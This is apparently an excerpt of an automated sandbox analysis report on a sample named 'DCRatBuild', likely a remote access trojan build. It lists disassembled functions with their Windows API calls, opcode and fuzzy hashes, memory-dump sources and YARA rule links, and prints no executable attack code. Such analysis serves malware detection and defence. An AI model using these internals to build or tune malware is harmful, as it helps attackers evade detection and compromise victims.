API String ID: 3188754299-0
Opcode ID: 0179e3d4cb555dfd14a8aae2639829ac50675fbbbf5b268a9bf33979c0c786e7
Instruction ID: 4b29587b8d9771bda625fe574cc09f82042bbaeec2234b4fccb385e98642aab8
Opcode Fuzzy Hash: 0179e3d4cb555dfd14a8aae2639829ac50675fbbbf5b268a9bf33979c0c786e7
Instruction Fuzzy Hash: D2E06D355001289BDF20AA689C05BD9B76CFB083A1F0042A2BD55E3690DA70DD449AE1

Function 008E0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 969505957bd9e14ff1690aa81320edf174b0c8615e8d81529861024b1dfbe2ca
Instruction ID: ffe7736f278b50a09fb938af1d809662cb5f23b843b4940da7093d70ea2b75a7
Opcode Fuzzy Hash: 969505957bd9e14ff1690aa81320edf174b0c8615e8d81529861024b1dfbe2ca
Instruction Fuzzy Hash: C2E0927691115CAACB209AA59C04FD6776CFF09382F0400A6B908D3104DAB09A808BA1

Function 008E9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008E9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 008E9B37

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: b44a5b4843c1b620365fb1db82dfeee0a2fcf9e2824dfd9c9e2f4a727549be90
Instruction ID: fd2cd13e4f43d6403d77cd19179fe861efb309c200446514afef911c50ab3eb3
Opcode Fuzzy Hash: b44a5b4843c1b620365fb1db82dfeee0a2fcf9e2824dfd9c9e2f4a727549be90
Instruction Fuzzy Hash: E0E0ED71901218EFCB20DF99D501699B7E8FB09321F10805BF999D3300E6B16E549B91

Function 008F215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 008F329A: try_get_function.LIBVCRUNTIME ref: 008F32AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008F217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008F2185

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 8660a7fdcdd010ccfb8e134c1d3dbb5cf4491c64f251c1e3a941645ea9a74c5e
Instruction ID: f75abfd2d02e9300cd9695b5cca8ae76770d4b2d51de915214c1745a7e15c88e
Opcode Fuzzy Hash: 8660a7fdcdd010ccfb8e134c1d3dbb5cf4491c64f251c1e3a941645ea9a74c5e
Instruction Fuzzy Hash: 6CD0A72510830E24690826B878420F83344F891B783F00B45E320C51D1EE116084741A

Function 008EDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 008EDC73
DloadProtectSection.DELAYIMP ref: 008EDC8F

Part of subcall function 008EDE67: DloadObtainSection.DELAYIMP ref: 008EDE77

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 640b5e93eb0e63c0d9fa0b112d67296f4aa68b67364331c12f6ac0bbac0ab63e
Instruction ID: a41340ced58fa0982866221543e2c3c1c62c65399ba4b19144421caf15c86d9d
Opcode Fuzzy Hash: 640b5e93eb0e63c0d9fa0b112d67296f4aa68b67364331c12f6ac0bbac0ab63e
Instruction Fuzzy Hash: D0D012701183C18EC211EB1A9D5A75D3670F787789F742601F196C75A0DFF44488EE07

Function 008D12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 008D12FB
ShowWindow.USER32(00000000), ref: 008D1302

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 419f93280669c1bd16dd130f8171a00014840b0a4de5e662241c3055642d88f7
Instruction ID: afe772fd5e4e136a28076678075a5dfbde5ddccefaa233a746cfde5926e4c2af
Opcode Fuzzy Hash: 419f93280669c1bd16dd130f8171a00014840b0a4de5e662241c3055642d88f7
Instruction Fuzzy Hash: 1BC0123206C200BECB010BB0ED09D2FBBA8ABA4212F05C928B6A5C0060C238C010EF11

Function 008D19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D19AB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d9845094a64fd68aa4e8f9827ccf8ac26e2548d8441d3b9e32d1468208990f14
Instruction ID: c6165d9a600a7ab6f7bd1281cb194f10c58ff0c66f1bbd8573bd4710e58fa5dc
Opcode Fuzzy Hash: d9845094a64fd68aa4e8f9827ccf8ac26e2548d8441d3b9e32d1468208990f14
Instruction Fuzzy Hash: A4C1A130A04254AFEF15CF68C498BA97BA5FF0A314F1842BBEC45DB386DB319944CB61

Function 008D3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D3B42

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5fbd20934f50a9c4166a52fdfd76f1bee3beeffdc4d7eca12c1ccc712c0c1f60
Instruction ID: e66aec1c180f9d14690d5be03af13a7698b33136e7cb18a6547db2249357fafc
Opcode Fuzzy Hash: 5fbd20934f50a9c4166a52fdfd76f1bee3beeffdc4d7eca12c1ccc712c0c1f60
Instruction Fuzzy Hash: AF71AF71504B48AEDB25DB74CC41AE7B7E9FB14301F444A6FE5AAC7242DA326A48CF12

Function 008D837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D8384

Part of subcall function 008D1380: __EH_prolog.LIBCMT ref: 008D1385
Part of subcall function 008D1380: new.LIBCMT ref: 008D13FE

Part of subcall function 008D19A6: __EH_prolog.LIBCMT ref: 008D19AB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4b370fe53f9e65a3d5e8226f50e9cce6df49346692984a28b1aabdd43570ea0a
Instruction ID: 8b5e3852b8dad9ce42d6a51c295cd9a57ed5e3ab1b9252a54c0ea8b2d9b43b27
Opcode Fuzzy Hash: 4b370fe53f9e65a3d5e8226f50e9cce6df49346692984a28b1aabdd43570ea0a
Instruction Fuzzy Hash: 2241CF318406589ADF20EB64CC55BEAB3A9FF10300F0441EBE58AE3292DF745EC8DB51

Function 008D1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D1E05

Part of subcall function 008D3B3D: __EH_prolog.LIBCMT ref: 008D3B42

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 226f1864bc86c2b4a1fced2843469b6ef261db68515a1c979866cec24c464052
Instruction ID: 3b663eb429113eb62c80fece79af8fd462122d0d5241639ef5a633cccc390915
Opcode Fuzzy Hash: 226f1864bc86c2b4a1fced2843469b6ef261db68515a1c979866cec24c464052
Instruction Fuzzy Hash: 83212672904248AECF11EFA9D9459EEBBF6FF59300B10026EE845A7351CB325E10CB61

Function 008EA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008EA7C8

Part of subcall function 008D1380: __EH_prolog.LIBCMT ref: 008D1385
Part of subcall function 008D1380: new.LIBCMT ref: 008D13FE

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6428ac599d7f8c98ce7ffe2434066b563a6edec541cc63234b334083b93aaf4d
Instruction ID: 2df69f05ca37ea377bc21ef4fa9b2a79136d2b76d99200d0785e15e2c4e50932
Opcode Fuzzy Hash: 6428ac599d7f8c98ce7ffe2434066b563a6edec541cc63234b334083b93aaf4d
Instruction Fuzzy Hash: 16216D71C04299AECF15DF99C9525EEB7B4FF1A304F0005AAE809E3342DB356E06CB62

Function 008D92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D92EB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 43e1eeec3563d3fc7dffc84d67601d0e0ea227860591d9a486180d792c612642
Instruction ID: d55060d8a2ba108d3544741de50ff9d295d07284f1ce8fbf0526b3a36293814f
Opcode Fuzzy Hash: 43e1eeec3563d3fc7dffc84d67601d0e0ea227860591d9a486180d792c612642
Instruction Fuzzy Hash: 77118E73A50529ABCF26AEACCC419DEB736FF48750F054316F804E7391DA348D1087A1

Function 008DAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 008DAA9A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 941f0886a7f313f37a1cc115e01f39b09cac18a6c28af34f0ff7d8856ea11f77
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: F0F08C3050072A9FDB38EE69C94172AB7E8FB21320F308B1BE496C2780E770D880C742

Function 008D5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D5BDC

Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8fe765608b4f6ca955d713992a497664ad8e26b20da76fb69b84c2f76b6a0478
Instruction ID: c5ce6a8bf8591c52c8e432eef3a97d0a98ba47ecfc0394deacade393f6aa09a3
Opcode Fuzzy Hash: 8fe765608b4f6ca955d713992a497664ad8e26b20da76fb69b84c2f76b6a0478
Instruction Fuzzy Hash: BB016D34A05684DAC725F7A8C0553EDF7A4EF59710F80429EA95A933C3CBB41B08D7A3

Function 008F8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7f9f0cee4073e9e0f44fa53b006922b4efe0d9a0c9249b3b86543b74c696d0a4
Instruction ID: f5d6271dc606eeb46aaf8cbeae624673fdb970d519a6de775696ea03378c09a0
Opcode Fuzzy Hash: 7f9f0cee4073e9e0f44fa53b006922b4efe0d9a0c9249b3b86543b74c696d0a4
Instruction Fuzzy Hash: 77E06D2164466DEBEB312B7D9C01BBA7B8CFF497B4F154220AF58EA191DE60CC0185E6

Function 008D96D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008D968F,?,?,?,?,00901FA1,000000FF), ref: 008D96EB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4a68610612f04046db7e24714a6fc4a1656b246f326661256862c32f88682e38
Instruction ID: f0ab92d462377ebf67d12497012151c3b5e18176d31c57ce91abf85fcb20c345
Opcode Fuzzy Hash: 4a68610612f04046db7e24714a6fc4a1656b246f326661256862c32f88682e38
Instruction Fuzzy Hash: ABF05E30556B058FDB308E24D549792B7E8EB22725F049B1FD0E7936A0EB61A88D9B00

Function 008DA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008DA4F5

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9925d92b0b0a0eb3c7bb6e273ed426bc9f6ff06f185ce1fe75158a71e273e472
Instruction ID: 9ddad5eca9058e8bdb03f4230c16f0d80a1e1c17e67b760005ccf60d44b64149
Opcode Fuzzy Hash: 9925d92b0b0a0eb3c7bb6e273ed426bc9f6ff06f185ce1fe75158a71e273e472
Instruction Fuzzy Hash: 3DF0B431009380AACE221BBC48047D6BBA1FF05331F24CB4AF1F982291C27414859723

Function 008E067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 008E06B1

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 0d939acf92c1d3f10f285ed5a6a2bcf066f795904d950c33fad67b0b20269fdc
Instruction ID: f4550fbdc547bbe0b82b934916e2b699fcd3a4d68de14ae3e7a5816241fc7eff
Opcode Fuzzy Hash: 0d939acf92c1d3f10f285ed5a6a2bcf066f795904d950c33fad67b0b20269fdc
Instruction Fuzzy Hash: BBD0CD2071419415CA21336D540A7FE1756EFC3720F084113B00DD3396CB9608C66693

Function 008E9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 008E9D81

Part of subcall function 008E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008E9B30

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 0af133f5f0576ee13bd287986381ba55fb33ef48d54e768dede8b4bf4142c3c1
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: F2D0A73071424CBADF40BE768C0297A7BACFB02310F008065FC48C6141EEF1DE10A262

Function 008D9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,008D9887), ref: 008D9995

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

